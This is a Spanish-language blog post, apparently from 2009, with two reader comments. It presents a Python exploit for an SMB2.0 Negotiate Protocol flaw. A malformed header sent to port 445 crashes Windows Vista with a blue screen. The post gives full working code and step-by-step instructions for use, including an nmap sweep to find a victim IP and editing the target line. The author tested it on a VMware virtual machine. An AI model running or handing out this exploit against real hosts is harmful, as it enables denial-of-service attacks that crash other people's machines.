Esta vulnerabilidad ha sido encontrada hace unos dias y afecta procotolo SMB, con lo que no se ha echo esperar mucho un exploit que la aprovecha, en este caso desarroyado por Laurent Gaffié en python. Aqui tenemos el exploit:
#!/usr/bin/python
# -*- coding: utf-8 -*-
#When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
from socket import socket
from time import sleep
host = "Ip-victima", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
Para utilizarlo (trabajando desde linux) copiamos y con cualquier editor de texto lo guardamos con el nombre que queramos y con extension .py (de python).
Por ejemplo:
morsa.py
Ahora ya tenemos el exploit, solo necesitamos una víctima, en mi caso dispongo de una máquina virtual vmware con Windows Vista SP1.
Bueno primero necesitamos la ip de la víctima, la podemos obtener ya sea por nmap o por cualquier otro método, en el caso de nmap seria:
sudo nmap -sP -PI 192.168.1.0/24Supongamos que la ip es 192.168.0.102 pues abrimos el exploit con el editor de texto plano (recomiendo kate) y editamos la línea que pone:
host = "Ip-victima", 445
Aqui sustituimos Ip-victima por 192.168.0.102 con lo que quedaria
host = "192.168.0.102", 445
Guardamos el exploit, nos dirigimos al directorio de este y abrimos una consola:
python morsa.pl Al lanzar esto y esperar unos segundos veremos el bonito pantallazo azul en la maquina virtual:
Bueno con esto espero que quede clara la utilización del exploit y recordad que Windows Vista no requiere de exploits para que deje de funcionar correctamente, ya que, el por si solo ya lo hace y con mucho esmero.
Aclaraciones: Esta vulnerabilidad se basa en los recursos compartidos de la máquina víctima, si Windows Vista tiene deshabilitada la opción de compartir archivos e impresoras no funcionara.
Un saludo.
Alpha.Aetsu
Podrias explicar mejor qué hace exatamente...
ResponderEliminarLa mejor info esta en la página del creador del exploit
ResponderEliminarhttp://g-laurent.blogspot.com/2009/09/windows-vista7-smb20-negotiate-protocol.html